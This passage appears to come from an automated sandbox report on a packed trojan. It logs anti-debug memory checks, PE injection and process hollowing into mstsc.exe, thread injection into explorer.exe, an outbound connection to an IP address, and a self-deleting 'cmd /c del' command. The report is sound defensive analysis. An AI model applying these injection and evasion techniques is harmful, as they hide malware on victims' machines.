Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C849B mov eax, dword ptr fs:[00000030h] 1_2_012C849B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h] 1_2_01336CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h] 1_2_01336CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h] 1_2_01336CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013714FB mov eax, dword ptr fs:[00000030h] 1_2_013714FB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388CD6 mov eax, dword ptr fs:[00000030h] 1_2_01388CD6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B4F2E mov eax, dword ptr fs:[00000030h] 1_2_012B4F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B4F2E mov eax, dword ptr fs:[00000030h] 1_2_012B4F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB73D mov eax, dword ptr fs:[00000030h] 1_2_012DB73D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB73D mov eax, dword ptr fs:[00000030h] 1_2_012DB73D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E3F33 mov eax, dword ptr fs:[00000030h] 1_2_012E3F33
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EE730 mov eax, dword ptr fs:[00000030h] 1_2_012EE730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA70E mov eax, dword ptr fs:[00000030h] 1_2_012EA70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA70E mov eax, dword ptr fs:[00000030h] 1_2_012EA70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134FF10 mov eax, dword ptr fs:[00000030h] 1_2_0134FF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134FF10 mov eax, dword ptr fs:[00000030h] 1_2_0134FF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0138070D mov eax, dword ptr fs:[00000030h] 1_2_0138070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0138070D mov eax, dword ptr fs:[00000030h] 1_2_0138070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DF716 mov eax, dword ptr fs:[00000030h] 1_2_012DF716
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4710 mov eax, dword ptr fs:[00000030h] 1_2_012E4710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CFF60 mov eax, dword ptr fs:[00000030h] 1_2_012CFF60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388F6A mov eax, dword ptr fs:[00000030h] 1_2_01388F6A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01371751 mov eax, dword ptr fs:[00000030h] 1_2_01371751
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CEF40 mov eax, dword ptr fs:[00000030h] 1_2_012CEF40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337794 mov eax, dword ptr fs:[00000030h] 1_2_01337794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337794 mov eax, dword ptr fs:[00000030h] 1_2_01337794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337794 mov eax, dword ptr fs:[00000030h] 1_2_01337794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C8794 mov eax, dword ptr fs:[00000030h] 1_2_012C8794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F37F5 mov eax, dword ptr fs:[00000030h] 1_2_012F37F5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0136FE3F mov eax, dword ptr fs:[00000030h] 1_2_0136FE3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BE620 mov eax, dword ptr fs:[00000030h] 1_2_012BE620
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BC600 mov eax, dword ptr fs:[00000030h] 1_2_012BC600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BC600 mov eax, dword ptr fs:[00000030h] 1_2_012BC600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BC600 mov eax, dword ptr fs:[00000030h] 1_2_012BC600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E8E00 mov eax, dword ptr fs:[00000030h] 1_2_012E8E00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA61C mov eax, dword ptr fs:[00000030h] 1_2_012EA61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA61C mov eax, dword ptr fs:[00000030h] 1_2_012EA61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01371608 mov eax, dword ptr fs:[00000030h] 1_2_01371608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C766D mov eax, dword ptr fs:[00000030h] 1_2_012C766D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h] 1_2_012DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h] 1_2_012DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h] 1_2_012DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h] 1_2_012DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h] 1_2_012DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h] 1_2_012C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h] 1_2_012C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h] 1_2_012C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h] 1_2_012C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h] 1_2_012C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h] 1_2_012C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137AE44 mov eax, dword ptr fs:[00000030h] 1_2_0137AE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137AE44 mov eax, dword ptr fs:[00000030h] 1_2_0137AE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013346A7 mov eax, dword ptr fs:[00000030h] 1_2_013346A7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01380EA5 mov eax, dword ptr fs:[00000030h] 1_2_01380EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01380EA5 mov eax, dword ptr fs:[00000030h] 1_2_01380EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01380EA5 mov eax, dword ptr fs:[00000030h] 1_2_01380EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134FE87 mov eax, dword ptr fs:[00000030h] 1_2_0134FE87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E16E0 mov ecx, dword ptr fs:[00000030h] 1_2_012E16E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C76E2 mov eax, dword ptr fs:[00000030h] 1_2_012C76E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E36CC mov eax, dword ptr fs:[00000030h] 1_2_012E36CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F8EC7 mov eax, dword ptr fs:[00000030h] 1_2_012F8EC7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388ED6 mov eax, dword ptr fs:[00000030h] 1_2_01388ED6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0136FEC0 mov eax, dword ptr fs:[00000030h] 1_2_0136FEC0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479746D mov eax, dword ptr fs:[00000030h] 6_2_0479746D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AA44B mov eax, dword ptr fs:[00000030h] 6_2_047AA44B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A3C3E mov eax, dword ptr fs:[00000030h] 6_2_047A3C3E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A3C3E mov eax, dword ptr fs:[00000030h] 6_2_047A3C3E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A3C3E mov eax, dword ptr fs:[00000030h] 6_2_047A3C3E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04848CD6 mov eax, dword ptr fs:[00000030h] 6_2_04848CD6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047ABC2C mov eax, dword ptr fs:[00000030h] 6_2_047ABC2C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h] 6_2_047F6C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h] 6_2_047F6C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h] 6_2_047F6C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h] 6_2_047F6C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048314FB mov eax, dword ptr fs:[00000030h] 6_2_048314FB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484740D mov eax, dword ptr fs:[00000030h] 6_2_0484740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484740D mov eax, dword ptr fs:[00000030h] 6_2_0484740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484740D mov eax, dword ptr fs:[00000030h] 6_2_0484740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 6_2_047F6CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 6_2_047F6CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 6_2_047F6CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0480C450 mov eax, dword ptr fs:[00000030h] 6_2_0480C450
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0480C450 mov eax, dword ptr fs:[00000030h] 6_2_0480C450
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 2896 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: AB0000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 9C6008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' Jump to behavior
Source: explorer.exe, 00000002.00000000.687108455.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000003.881834324.0000000006499000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000010.00000002.1042861311.00000000048E7000.00000004.00000001.sdmp Binary or memory string: Progmank
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow
Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndQ
Source: explorer.exe, 00000010.00000002.1026816481.0000000000DD7000.00000004.00000020.sdmp Binary or memory string: CProgman-71

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132561585936642615.txt VolumeInformation
